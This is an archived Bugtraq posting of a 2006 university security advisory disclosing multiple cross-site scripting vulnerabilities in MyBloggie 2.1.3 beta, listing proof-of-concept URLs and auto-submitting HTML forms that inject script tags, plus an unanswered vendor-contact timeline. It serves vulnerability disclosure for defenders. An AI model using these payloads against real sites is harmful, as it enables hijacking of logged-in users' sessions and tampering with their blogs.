Bugtraq mailing list archives

MyBloggie: Multiple XSS Vulnerabilities

From: enji () seclab tuwien ac at
Date: 9 Mar 2006 14:39:42 -0000
===========================================================
MyBloggie: Multiple XSS Vulnerabilities
===========================================================
Technical University of Vienna Security Advisory
TUVSA-0603-002, March 9, 2006
===========================================================


Affected applications
----------------------

MyBloggie (mybloggie.mywebland.com)

Versions 2.1.3 beta and prior.


Description
------------

There are multiple cross-site scripting (XSS) vulnerabilities which can be verified by using the following exploits 
(the user needs to be logged in). They are roughly sorted by entry points (i.e., the names of the files that have to be 
navigated). The vulnerabilities were discovered under the assumption that register_globals is on, and that 
magic_quotes_gpc is off.


index.php
-----------

- message.php, 602:
  - from delcomment.php, 48:

    http://localhost/mybloggie213beta/index.php?mode=delcom&confirmredirect=";><script>alert('xss_string')</script>

- delcomment.php, 61 (2x):

  <form action="http://localhost/mybloggie213beta/index.php?mode=delcom&comment_id=1&redirect=adm&confirm=yes"; 
method="post">
    <input type="text" name="post_id" value='">xss_string' />
    <input type="submit"/>
  </form>
  <script type="text/javascript">
    document.forms[0].submit();
  </script>

  directly injecting "script" tags via the "post_id" parameter does not work, 
  requires an alternative attack:

- delcomment.php, 48:

  <form action="http://localhost/mybloggie213beta/index.php?mode=delcom&comment_id=1"; method="post">
    <input type="text" name="post_id" value='">xss_string' />
    <input type="submit"/>
  </form>
  <script type="text/javascript">
    document.forms[0].submit();
  </script>

 
admin.php
-----------


- upload.php, 136:

  http://localhost/mybloggie213beta/admin.php?mode=upload&del=xss_string

- upload.php, 211:

  http://localhost/mybloggie213beta/admin.php?mode=upload&message=xss_string

- function.php, 578
  - from addcat.php, 70:

    <form 
action="http://localhost/mybloggie213beta/admin.php?mode=addcat&errormsg=<script>alert('xss_string')</script>" 
method="post">
      <input type="text" name="cat_desc" value='' />
      <input type="submit"/>
    </form>
    <script type="text/javascript">
      document.forms[0].submit();
    </script>

  - from edituser.php, 88:

    <form 
action="http://localhost/mybloggie213beta/admin.php?mode=edituser&id=1&pass=yes&errormsg=<script>alert('xss_string')</script>"
 method="post">
      <input type="text" name="password" value='' />
      <input type="text" name="repassword" value='' />
      <input type="text" name="user" value='' />  
      <input type="submit"/>
    </form>
    <script type="text/javascript">
      document.forms[0].submit();
    </script>

  - from adduser.php, 64:

    <form 
action="http://localhost/mybloggie213beta/admin.php?mode=adduser&errormsg=<script>alert('xss_string')</script>" 
method="post">
      <input type="text" name="password" value='' />
      <input type="text" name="repassword" value='' />
      <input type="text" name="user" value='x' />
      <input type="submit"/>
    </form>
    <script type="text/javascript">
      document.forms[0].submit();
    </script>

  - from editcat.php, 93:

    <form 
action="http://localhost/mybloggie213beta/admin.php?mode=editcat&errormsg=<script>alert('xss_string')</script>" 
method="post">
      <input type="text" name="cat_desc" value='' />
      <input type="submit"/>
    </form>
    <script type="text/javascript">
      document.forms[0].submit();
    </script>

- function.php, 602

  - from add.php, 270:

    <form action="http://localhost/mybloggie213beta/admin.php?mode=add"; method="post">
      <input type="text" name="submit" value='xyz' />
      <input type="text" name="message" value='xyz' />
      <input type="text" name="trackback_url" value='<script>alert("xss_string")</script>' />
      <input type="submit">
    </form>
    <script type="text/javascript">
      document.forms[0].submit();
    </script>

    automatic submission via JavaScript does not work here,
    requires an alternative mechanism

  - from deluser.php, 49:

    http://localhost/mybloggie213beta/admin.php?mode=deluser&id=";><script>alert('xss_string')</script>
  
  - from delcat.php, 48:

    http://localhost/mybloggie213beta/admin.php?mode=delcat&cat_id=";><script>alert('xss_string')</script>
    
  - from del.phph, 39:

    http://localhost/mybloggie213beta/admin.php?mode=del&post_id=";><script>alert('xss_string')</script>


Solution
---------

The authors have not responded to our messages, so there is no solution to these issues yet.

Timeline:

February 18, 2006:
Vulnerabilities indicated via mwsean at gmail dot com, but no response.

March 9, 2006:
Advisory submission.


References
-----------

http://www.seclab.tuwien.ac.at/advisories/TUVSA-0603-002.txt


Nenad Jovanovic
Secure Systems Lab 
Technical University of Vienna 
www.seclab.tuwien.ac.at
Current thread:

MyBloggie: Multiple XSS Vulnerabilities enji (Mar 09)